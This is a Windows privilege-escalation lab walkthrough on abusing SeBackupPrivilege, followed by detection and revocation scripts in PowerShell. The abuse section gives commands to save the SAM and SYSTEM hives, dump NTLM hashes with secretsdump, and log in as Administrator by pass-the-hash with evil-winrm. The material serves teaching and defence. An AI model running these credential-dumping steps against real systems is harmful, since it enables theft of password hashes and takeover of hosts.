The SeBackupPrivilege is a Windows privilege that provides a user or process with the ability to read files and directories, regardless of the security settings on those objects. This privilege can be used by certain backup programs or processes that require the capability to back up or copy files that would not normally be accessible to the user.
However, if this privilege is not properly managed, or is granted to users or processes that should not have it, it becomes a privilege escalation path: because the privilege bypasses the access controls on files and registry keys, a holder can read sensitive data (such as the local SAM and SYSTEM registry hives shown below) and use it to gain unauthorized access to the system.
- Open a PowerShell with local Administrator privileges and run the following command to create a new user:
net user ncv Passw0rd! /add
- Run the following command to enable WinRM service:
Enable-PSRemoting -Force
- Add the new user to "Remote Management Users" group:
net localgroup "Remote Management Users" ncv /add
- Then, run the following commands to install and import the Carbon module:
Install-Module -Name carbon -Force
and
Import-Module carbon
- Use the following cmdlets to grant the SeBackupPrivilege to the new ncv user and verify the privilege:
Grant-CPrivilege -Identity ncv -Privilege SeBackupPrivilege
and
Test-CPrivilege -Identity ncv -Privilege SeBackupPrivilege
Alternatively, the lab can be set up with the custom PowerShell script named SeBackupPrivilege.ps1.
Open a PowerShell with local Administrator privileges and run the script:
.\SeBackupPrivilege.ps1
To perform manual enumeration, open a command prompt and use the following command to list the privileges held by the current user's token (a privilege listed as Disabled is still held; it only has to be enabled by the process before use):
whoami /priv
To run the SharpUp tool and enumerate the SeBackupPrivilege vulnerability, execute the following command with the appropriate arguments:
SharpUp.exe audit TokenPrivileges
To abuse this vulnerability you should follow these steps:
- Create a temp directory:
mkdir C:\temp
- Copy the SAM and SYSTEM hives from HKLM to C:\temp and then download them:
reg save hklm\sam C:\temp\sam.hive
and
reg save hklm\system C:\temp\system.hive
- Use the impacket-secretsdump tool (installed by default on Kali Linux) to obtain the NTLM hashes:
impacket-secretsdump -sam sam.hive -system system.hive LOCAL
- Use evil-winrm again, this time passing the hash, to connect as the local Administrator:
evil-winrm -i <ip> -u "Administrator" -H "<hash>"
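The hive-dump steps above leave a trail in the Security log, which is what a defender should be watching for. The following PowerShell is an added example (not part of the original walkthrough): it lists Security events in which SeBackupPrivilege was enabled in a token (event 4703) or used for a privileged operation (events 4673 and 4674). It assumes an elevated shell and that the "Audit Token Right Adjusted" and "Audit Sensitive Privilege Use" audit subcategories are enabled; the function name Get-SeBackupPrivilegeEvents is my own.

```powershell
# Added example, not from the original walkthrough: hunt the local Security log for
# SeBackupPrivilege being enabled in a token (4703) or used in a privileged operation
# (4673/4674). Assumes the "Audit Token Right Adjusted" and "Audit Sensitive Privilege
# Use" subcategories are enabled and that the shell is elevated (reading Security needs it).
function Get-SeBackupPrivilegeEvents {
    param(
        [datetime]$Since = (Get-Date).AddHours(-24)
    )

    $filter = @{ LogName = 'Security'; Id = 4703, 4673, 4674; StartTime = $Since }
    $events = Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue |
        Where-Object { $_.Message -match 'SeBackupPrivilege' }

    foreach ($e in $events) {
        # Read the named EventData fields from the event XML rather than scraping the message text
        $xml  = [xml]$e.ToXml()
        $data = @{}
        foreach ($d in $xml.Event.EventData.Data) { $data[$d.Name] = $d.'#text' }

        # 4703 carries the privilege in EnabledPrivilegeList; 4673/4674 carry it in PrivilegeList
        $privs = if ($data.ContainsKey('EnabledPrivilegeList')) { $data['EnabledPrivilegeList'] } else { $data['PrivilegeList'] }

        [pscustomobject]@{
            Time       = $e.TimeCreated
            EventId    = $e.Id
            User       = "$($data['SubjectDomainName'])\$($data['SubjectUserName'])"
            Process    = $data['ProcessName']
            Privileges = ($privs -replace '\s+', ' ').Trim()
            Object     = $data['ObjectName']   # set for 4674 (e.g. a registry key), empty otherwise
        }
    }
}

# Usage: accounts outside the ones expected to run backups deserve a look, and reg.exe
# enabling the privilege is a strong signal given the hive-save technique described above.
Get-SeBackupPrivilegeEvents -Since (Get-Date).AddDays(-7) |
    Where-Object { $_.User -notmatch 'SYSTEM$' } |
    Sort-Object Time |
    Format-Table -AutoSize
```

Event 4703 is only emitted on Windows 10 / Server 2016 and later, so on older hosts rely on 4673/4674. Volume for 4673 can be high on busy servers; scoping the query by process name (reg.exe, robocopy.exe, custom tools) or by excluding the service accounts that legitimately back up the host keeps it manageable.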
Follow the steps below to remove the SeBackupPrivilege from a user:
- Press Win + R to open the Run dialog, type secpol.msc, and hit Enter. This will open the Local Security Policy editor.
- In the Local Security Policy editor, navigate to Local Policies > User Rights Assignment.
- Look for the Back up files and directories policy (which corresponds to SeBackupPrivilege).
- Double-click the policy, and a properties window will appear.
- In the properties window, remove the user or group from the list to revoke the privilege. Click Apply and then OK to save the changes.
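The GUI steps above can be scripted, which also gives you a host-wide version of the check in the enumeration section (whoami /priv only shows the current user's token; this lists every account assigned the right). The following PowerShell is an added example, not part of the original walkthrough or of the Carbon module: it exports the local user-rights assignment with secedit, lists every account holding SeBackupPrivilege, and removes one account from the assignment. The function names and the temporary file paths under $env:TEMP are my own choices; ncv is the lab user created in the setup section.

```powershell
# Added example, not from the original walkthrough: audit who holds SeBackupPrivilege on
# this host and, optionally, remove one account from the assignment without secpol.msc.
# Uses secedit to export/import the local policy; run from an elevated PowerShell.
function Get-SeBackupPrivilegeHolders {
    $cfg = Join-Path $env:TEMP 'ur-export.inf'
    # Export only the user-rights area of the local security policy
    secedit /export /cfg $cfg /areas USER_RIGHTS | Out-Null
    # The relevant line looks like: SeBackupPrivilege = *S-1-5-32-544,*S-1-5-32-551
    $line = Select-String -Path $cfg -Pattern '^SeBackupPrivilege\s*=' | Select-Object -First 1
    Remove-Item $cfg -ErrorAction SilentlyContinue
    if (-not $line) { return @() }

    $raw = ($line.Line -split '=', 2)[1]
    foreach ($entry in ($raw -split ',')) {
        $sidText = $entry.Trim().TrimStart('*')
        if (-not $sidText) { continue }
        # Entries are normally SIDs prefixed with *; unresolvable ones may appear as plain names
        $name = $sidText
        try {
            $name = ([System.Security.Principal.SecurityIdentifier]$sidText).Translate([System.Security.Principal.NTAccount]).Value
        } catch { }
        [pscustomobject]@{ Sid = $sidText; Account = $name }
    }
}

function Remove-SeBackupPrivilegeHolder {
    param([Parameter(Mandatory)][string]$Account)

    $sid  = ([System.Security.Principal.NTAccount]$Account).Translate([System.Security.Principal.SecurityIdentifier]).Value
    $keep = Get-SeBackupPrivilegeHolders |
        Where-Object { $_.Sid -ne $sid } |
        ForEach-Object { if ($_.Sid -like 'S-1-*') { '*' + $_.Sid } else { $_.Sid } }

    # Minimal security template containing only the rewritten assignment
    $inf = Join-Path $env:TEMP 'ur-fix.inf'
    $db  = Join-Path $env:TEMP 'ur-fix.sdb'
    @(
        '[Unicode]', 'Unicode=yes',
        '[Version]', 'signature="$CHICAGO$"', 'Revision=1',
        '[Privilege Rights]',
        "SeBackupPrivilege = $($keep -join ',')"
    ) | Set-Content -Path $inf -Encoding Unicode

    secedit /configure /db $db /cfg $inf /areas USER_RIGHTS | Out-Null
    Remove-Item $inf, $db -ErrorAction SilentlyContinue
}

# Before: list current holders (a default install shows Administrators and Backup Operators)
Get-SeBackupPrivilegeHolders | Format-Table -AutoSize

# Revoke from the lab user and confirm
Remove-SeBackupPrivilegeHolder -Account 'ncv'
Get-SeBackupPrivilegeHolders | Format-Table -AutoSize
```

As with the GUI route, the change only affects tokens created after it is applied: an existing session of the user keeps the privilege until that user logs off, so a session already established over WinRM should be terminated as part of the cleanup. On domain-joined machines, a Group Policy that assigns the right will re-apply it at the next policy refresh, so the fix belongs in the GPO rather than in the local policy.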